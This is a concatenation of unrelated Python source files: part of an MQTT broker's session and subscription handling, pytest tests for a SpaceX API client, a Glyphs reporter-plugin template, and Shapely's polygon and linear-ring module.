Create a BrokerProtocolHandler and attach to a session
:return:
"""
handler = BrokerProtocolHandler(self.plugins_manager, self._loop)
handler.attach(session, reader, writer)
return handler
@asyncio.coroutine
def _stop_handler(self, handler):
"""
Stop a running handler and detach if from the session
:param handler:
:return:
"""
try:
yield from handler.stop()
except Exception as e:
self.logger.error(e)
@asyncio.coroutine
def authenticate(self, session: Session, listener):
"""
This method call the authenticate method on registered plugins to test user authentication.
User is considered authenticated if all plugins called returns True.
Plugins authenticate() method are supposed to return :
- True if user is authentication succeed
- False if user authentication fails
- None if authentication can't be achieved (then plugin result is then ignored)
:param session:
:param listener:
:return:
"""
auth_plugins = None
auth_config = self.config.get('auth', None)
if auth_config:
auth_plugins = auth_config.get('plugins', None)
returns = yield from self.plugins_manager.map_plugin_coro(
"authenticate",
session=session,
filter_plugins=auth_plugins)
auth_result = True
if returns:
for plugin in returns:
res = returns[plugin]
if res is False:
auth_result = False
self.logger.debug("Authentication failed due to '%s' plugin result: %s" % (plugin.name, res))
else:
self.logger.debug("'%s' plugin result: %s" % (plugin.name, res))
# If all plugins returned True, authentication is success
return auth_result
@asyncio.coroutine
def topic_filtering(self, session: Session, topic):
"""
This method call the topic_filtering method on registered plugins to check that the subscription is allowed.
User is considered allowed if all plugins called return True.
Plugins topic_filtering() method are supposed to return :
- True if MQTT client can be subscribed to the topic
- False if MQTT client is not allowed to subscribe to the topic
- None if topic filtering can't be achieved (then plugin result is then ignored)
:param session:
:param listener:
:param topic: Topic in which the client wants to subscribe
:return:
"""
topic_plugins = None
topic_config = self.config.get('topic-check', None)
if topic_config and topic_config.get('enabled', False):
topic_plugins = topic_config.get('plugins', None)
returns = yield from self.plugins_manager.map_plugin_coro(
"topic_filtering",
session=session,
topic=topic,
filter_plugins=topic_plugins)
topic_result = True
if returns:
for plugin in returns:
res = returns[plugin]
if res is False:
topic_result = False
self.logger.debug("Topic filtering failed due to '%s' plugin result: %s" % (plugin.name, res))
else:
self.logger.debug("'%s' plugin result: %s" % (plugin.name, res))
# If all plugins returned True, authentication is success
return topic_result
def retain_message(self, source_session, topic_name, data, qos=None):
if data is not None and data != b'':
# If retained flag set, store the message for further subscriptions
self.logger.debug("Retaining message on topic %s" % topic_name)
retained_message = RetainedApplicationMessage(source_session, topic_name, data, qos)
self._retained_messages[topic_name] = retained_message
else:
# [MQTT-3.3.1-10]
if topic_name in self._retained_messages:
self.logger.debug("Clear retained messages for topic '%s'" % topic_name)
del self._retained_messages[topic_name]
@asyncio.coroutine
def add_subscription(self, subscription, session):
try:
a_filter = subscription[0]
if '#' in a_filter and not a_filter.endswith('#'):
# [MQTT-4.7.1-2] Wildcard character '#' is only allowed as last character in filter
return 0x80
if a_filter != "+":
if '+' in a_filter:
if "/+" not in a_filter and "+/" not in a_filter:
# [MQTT-4.7.1-3] + wildcard character must occupy entire level
return 0x80
# Check if the client is authorised to connect to the topic
permitted = yield from self.topic_filtering(session, topic=a_filter)
if not permitted:
return 0x80
qos = subscription[1]
if 'max-qos' in self.config and qos > self.config['max-qos']:
qos = self.config['max-qos']
if a_filter not in self._subscriptions:
self._subscriptions[a_filter] = []
already_subscribed = next(
(s for (s, qos) in self._subscriptions[a_filter] if s.client_id == session.client_id), None)
if not already_subscribed:
self._subscriptions[a_filter].append((session, qos))
else:
self.logger.debug("Client %s has already subscribed to %s" % (format_client_message(session=session), a_filter))
return qos
except KeyError:
return 0x80
def _del_subscription(self, a_filter, session):
"""
Delete a session subscription on a given topic
:param a_filter:
:param session:
:return:
"""
deleted = 0
try:
subscriptions = self._subscriptions[a_filter]
for index, (sub_session, qos) in enumerate(subscriptions):
if sub_session.client_id == session.client_id:
self.logger.debug("Removing subscription on topic '%s' for client %s" %
(a_filter, format_client_message(session=session)))
subscriptions.pop(index)
deleted += 1
break
except KeyError:
# Unsubscribe topic not found in current subscribed topics
pass
finally:
return deleted
def _del_all_subscriptions(self, session):
"""
Delete all topic subscriptions for a given session
:param session:
:return:
"""
filter_queue = deque()
for topic in self._subscriptions:
if self._del_subscription(topic, session):
filter_queue.append(topic)
for topic in filter_queue:
if not self._subscriptions[topic]:
del self._subscriptions[topic]
def matches(self, topic, a_filter):
if "#" not in a_filter and "+" not in a_filter:
# if filter doesn't contain wildcard, return exact match
return a_filter == topic
else:
# else use regex
match_pattern = re.compile(a_filter.replace('#', '.*').replace('$', '\$').replace('+', '[/\$\s\w\d]+'))
return match_pattern.match(topic)
@asyncio.coroutine
def _broadcast_loop(self):
running_tasks = deque()
try:
while True:
while running_tasks and running_tasks[0].done():
running_tasks.popleft()
broadcast = yield from self._broadcast_queue.get()
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug("broadcasting %r" % broadcast)
for k_filter in self._subscriptions:
if broadcast['topic'].startswith("$") and (k_filter.startswith("+") or k_filter.startswith("#")):
self.logger.debug("[MQTT-4.7.2-1] - ignoring brodcasting $ topic to subscriptions starting with + or #")
elif self.matches(broadcast['topic'], k_filter):
subscriptions = self._subscriptions[k_filter]
for (target_session, qos) in subscriptions:
if 'qos' in broadcast:
qos = broadcast['qos']
if target_session.transitions.state == 'connected':
self.logger.debug("broadcasting application message from %s on topic '%s' to %s" %
(format_client_message(session=broadcast['session']),
broadcast['topic'], format_client_message(session=target_session)))
handler = self._get_handler(target_session)
task = asyncio.ensure_future(
handler.mqtt_publish(broadcast['topic'], broadcast['data'], qos, retain=False),
loop=self._loop)
running_tasks.append(task)
else:
self.logger.debug("retaining application message from %s on topic '%s' to client '%s'" %
(format_client_message(session=broadcast['session']),
broadcast['topic'], format_client_message(session=target_session)))
retained_message = RetainedApplicationMessage(
broadcast['session'], broadcast['topic'], broadcast['data'], qos)
yield from target_session.retained_messages.put(retained_message)
except CancelledError:
# Wait until current broadcasting tasks end
if running_tasks:
yield from asyncio.wait(running_tasks, loop=self._loop)
@asyncio.coroutine
def _broadcast_message(self, session, topic, data, force_qos=None):
broadcast = {
'session': session,
'topic': topic,
'data': data
}
if force_qos:
broadcast['qos'] = force_qos
yield from self._broadcast_queue.put(broadcast)
@asyncio.coroutine
def publish_session_retained_messages(self, session):
self.logger.debug("Publishing %d messages retained for session %s" %
(session.retained_messages.qsize(), format_client_message(session=session))
)
publish_tasks = []
handler = self._get_handler(session)
while not session.retained_messages.empty():
retained = yield from session.retained_messages.get()
publish_tasks.append(asyncio.ensure_future(
handler.mqtt_publish(
retained.topic, retained.data, retained.qos, True), loop=self._loop))
if publish_tasks:
yield from asyncio.wait(publish_tasks, loop=self._loop)
@asyncio.coroutine
def publish_retained_messages_for_subscription(self, subscription, session):
self.logger.debug("Begin broadcasting messages retained due to subscription on '%s' from %s" %
(subscription[0], format_client_message(session=session)))
publish_tasks = []
handler = self._get_handler(session)
for d_topic in self._retained_messages:
self.logger.debug("matching : %s %s" % (d_topic, subscription[0]))
if self.matches(d_topic, subscription[0]):
self.logger.debug("%s and %s match" % (d_topic, subscription[0]))
retained = self._retained_messages[d_topic]
publish_tasks.append(asyncio.Task(
handler.mqtt_publish(
retained.topic, retained.data, subscription[1], True), loop=self._loop))
if publish_tasks:
yield from asyncio.wait(publish_tasks, loop=self._loop)
self.logger.debug("End broadcasting messages retained due to subscription on '%s' from %s" %
(subscription[0], format_client_message(session=session)))
def delete_session(self, client_id):
"""
Delete an existing session data, for example due to clean session set in CONNECT
:param client_id:
:return:
"""
try:
session = self._sessions[client_id][0]
except KeyError:
session = None
if session is None:
self.logger.debug("Delete session : session %s doesn't exist" % client_id)
return
# Delete subscriptions
self.logger.debug("deleting session %s subscriptions" % repr(session))
self._del_all_subscriptions(session)
self.logger.debug("deleting existing session %s" % repr(self._sessions[client_id]))
del self._sessions[client_id]
def _get_handler(self, session):
client_id = session.client_id
if client_id:
try:
return self._sessions[client_id][1]
except KeyError:
pass
return None
|
import sys
sys.path.append('../')
import pytest
import spacexpython
from .tutils import *
def test_api():
api_data = ''
api_result = alphaOrder(readJSONFile('info/api.json'))
try:
api_data = alphaOrder(spacexpython.info.api())
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print ("Failure on info.api")
assert api_result == api_data
def test_company():
company_data = ''
company_result = alphaOrder(readJSONFile('info/company.json'))
try:
company_data = alphaOrder(spacexpython.info.company())
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print ("Failure on info.company")
assert company_data == company_result
def test_clients():
client_data = ''
client_result = keyOrder(alphaOrder(
readJSONFile('info/clients.json')), "Name")
try:
client_data = keyOrder(
alphaOrder(spacexpython.info.clients()), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.clients")
assert client_data == client_result
def test_language():
language_data = ''
language_result = keyOrder(alphaOrder(
readJSONFile('info/oneclientmine.json')), "Name")
try:
language_data = keyOrder(alphaOrder(
spacexpython.info.clients(
'{"Languages":["Python"], '
+ ' "Creators":["Andrew Shapton"]}')), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.clients(Language)")
assert language_data == language_result
def test_apps():
apps_data = ''
apps_result = keyOrder(alphaOrder(
readJSONFile('info/apps.json')), "Name")
try:
apps_data = keyOrder(
alphaOrder(spacexpython.info.apps()), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.apps")
print(apps_data)
assert apps_data == apps_result
def test_one_app():
one_app_data = ''
one_app_result = keyOrder(alphaOrder(
readJSONFile('info/oneapsxmw.json')), "Name")
try:
one_app_data = keyOrder(alphaOrder(
spacexpython.info.apps(
'{"Name":["SpaceX Mission Watch"]}')), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.apps(Name)")
assert one_app_data == one_app_result
|
# encoding: utf-8
###########################################################################################################
#
#
# Reporter Plugin
#
# Read the docs:
# https://github.com/schriftgestalt/GlyphsSDK/tree/master/Python%20Templates/Reporter
#
#
###########################################################################################################
from __future__ import division, print_function, unicode_literals
import objc
from GlyphsApp import *
from GlyphsApp.plugins import *
class ____PluginClassName____(ReporterPlugin):
@objc.python_method
def settings(self):
self.menuName = Glyphs.localize({'en': u'My Plugin', 'de': u'Mein Plugin'})
self.generalContextMenus = [
{'name': Glyphs.localize({'en': u'Do something', 'de': u'Tu etwas'}), 'action': self.doSomething},
]
@objc.python_method
def foreground(self, layer):
NSColor.blueColor().set()
NSBezierPath.fillRect_(layer.bounds)
self.drawTextAtPoint(layer.parent.name, NSPoint(0, 0))
@objc.python_method
def inactiveLayer(self, layer):
NSColor.redColor().set()
if layer.paths:
layer.bezierPath.fill()
if layer.components:
for component in layer.components:
component.bezierPath.fill()
@objc.python_method
def preview(self, layer):
NSColor.blueColor().set()
if layer.paths:
layer.bezierPath.fill()
if layer.components:
for component in layer.components:
component.bezierPath.fill()
@objc.python_method
def doSomething(self):
print('Just did something')
@objc.python_method
def conditionalContextMenus(self):
# Empty list of context menu items
contextMenus = []
# Execute only if layers are actually selected
if Glyphs.font.selectedLayers:
layer = Glyphs.font.selectedLayers[0]
# Exactly one object is selected and it’s an anchor
if len(layer.selection) == 1 and type(layer.selection[0]) == GSAnchor:
# Add context menu item
contextMenus.append({'name': Glyphs.localize({'en': u'Do something else', 'de': u'Tu etwas anderes'}), 'action': self.doSomethingElse})
# Return list of context menu items
return contextMenus
@objc.python_method
def doSomethingElse(self):
print('Just did something else')
@objc.python_method
def __file__(self):
"""Please leave this method unchanged"""
return __file__
|
"""Polygons and their linear ring components
"""
import sys
import warnings
from ctypes import c_void_p, cast, POINTER
import weakref
from shapely.algorithms.cga import signed_area
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry, geos_geom_from_py
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.point import Point
from shapely.geometry.proxy import PolygonProxy
from shapely.errors import TopologicalError, ShapelyDeprecationWarning
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
"""
A closed one-dimensional feature comprising one or more line segments
A LinearRing that crosses itself or touches itself at a single point is
invalid and operations on it may fail.
"""
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
Rings are implicitly closed. There is no need to specific a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
ret = geos_linearring_from_py(coordinates)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
# Coordinate access
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
warnings.warn(
"Setting the 'coords' to mutate a Geometry in place is deprecated,"
" and will not be possible any more in Shapely 2.0",
ShapelyDeprecationWarning, stacklevel=2)
self._empty()
ret = geos_linearring_from_py(coordinates)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
coords = property(_get_coords, _set_coords)
def __setstate__(self, state):
"""WKB doesn't differentiate between LineString and LinearRing so we
need to move the coordinate sequence into the correct geometry type"""
super(LinearRing, self).__setstate__(state)
cs = lgeos.GEOSGeom_getCoordSeq(self.__geom__)
cs_clone = lgeos.GEOSCoordSeq_clone(cs)
lgeos.GEOSGeom_destroy(self.__geom__)
self.__geom__ = lgeos.GEOSGeom_createLinearRing(cs_clone)
@property
def is_ccw(self):
"""True is the ring is oriented counter clock-wise"""
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
warnings.warn(
"The proxy geometries (through the 'asShape()', 'asLinearRing()' or "
"'LinearRingAdapter()' constructors) are deprecated and will be "
"removed in Shapely 2.0. Use the 'shape()' function or the "
"standard 'LinearRing()' constructor instead.",
ShapelyDeprecationWarning, stacklevel=3)
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
"""Adapt an object to the LinearRing interface"""
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def __next__(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in range(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring._set_geom(g)
ring.__p__ = self
ring._other_owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
"""
A two-dimensional figure bounded by a linear ring
A polygon has a non-zero area. It may have one or more negative-space
"holes" which are also bounded by linear rings. If any rings cross each
other, the feature is invalid and operations on it may fail.
Attributes
----------
exterior : LinearRing
The ring which bounds the positive space of the polygon.
interiors : sequence
A sequence of rings which bound all existing holes.
"""
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
else:
self._empty()
@property
def exterior(self):
if self.is_empty:
return LinearRing()
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring._set_geom(g)
ring.__p__ = self
ring._other_owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
def __eq__(self, other):
if not isinstance(other, Polygon):
return False
check_empty = (self.is_empty, other.is_empty)
if all(check_empty):
return True
elif any(check_empty):
return False
my_coords = [
tuple(self.exterior.coords),
[tuple(interior.coords) for interior in self.interiors]
]
other_coords = [
tuple(other.exterior.coords),
[tuple(interior.coords) for interior in other.interiors]
]
return my_coords == other_coords
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
@property
def _ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior._ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
if self.exterior == LinearRing():
coords = []
else:
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)}
def svg(self, scale_factor=1., fill_color=None):
"""Returns SVG path element for the Polygon geometry.
Parameters
==========
scale_factor : float
Multiplication factor for the SVG stroke-width. Default is 1.
fill_color : str, optional
Hex string for fill color. Default is to use "#66cc99" if
geometry is valid, and "#ff3333" if invalid.
"""
if self.is_empty:
return '<g />'
if fill_color is None:
fill_color = "#66cc99" if self.is_valid else "#ff3333"
exterior_coords = [
["{},{}".format(*c) for c in self.exterior.coords]]
interior_coords = [
["{},{}".format(*c) for c in interior.coords]
for interior in self.interiors]
path = " ".join([
"M {} L {} z".format(coords[0], " L ".join(coords[1:]))
for coords in exterior_coords + interior_coords])
return (
'<path fill-rule="evenodd" fill="{2}" stroke="#555555" '
'stroke-width="{0}" opacity="0.6" d="{1}" />'
).format(2. * scale_factor, path, fill_color)
@classmethod
def from_bounds(cls, xmin, ymin, xmax, ymax):
"""Construct a `Polygon()` from spatial bounds."""
return cls([
(xmin, ymin),
(xmin, ymax),
(xmax, ymax),
(xmax, ymin)])
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
warnings.warn(
"The proxy geometries (through the 'asShape()', 'asPolygon()' or "
"'PolygonAdapter()' constructors) are deprecated and will be "
"removed in Shapely 2.0. Use the 'shape()' function or the "
"standard 'Polygon()' constructor instead.",
ShapelyDeprecationWarning, stacklevel=4)
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
# From array protocol
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
# Fall back on list
return len(self.shell[0])
def asPolygon(shell, holes=None):
"""Adapt objects to the Polygon interface"""
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a valid LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif not ob.is_valid:
raise TopologicalError("An input LineString must be valid.")
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # generators
ob = list(ob)
m = len(ob)
if m == 0:
return None
def _coords(o):
if isinstance(o, Point):
return o.coords[0]
else:
return o
n = len(_coords(ob[0]))
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
# Add closing coordinates if not provided
if (
m == 3
or _coords(ob[0])[0] != _coords(ob[-1])[0]
or _coords(ob[0])[1] != _coords(ob[-1])[1]
):
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim))
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = _coords(ob[i])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = _coords(ob[0])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is None:
return None
if isinstance(shell, Polygon):
return geos_geom_from_py(shell)
if shell is not None:
ret = geos_linearring_from_py(shell)
if ret is None:
return None
geos_shell, ndim = ret
if holes is not None and len(holes) > 0:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
if not L >= 1:
raise ValueError("number of holes must be non zero")
if N not in (2, 3):
raise ValueError("insufficiant coordinate dimension")
# Array of pointers to ring geometries
geos_holes = (c_void_p * L)()
# add to coordinate sequence
for l in range(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell), geos_holes, L), ndim)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.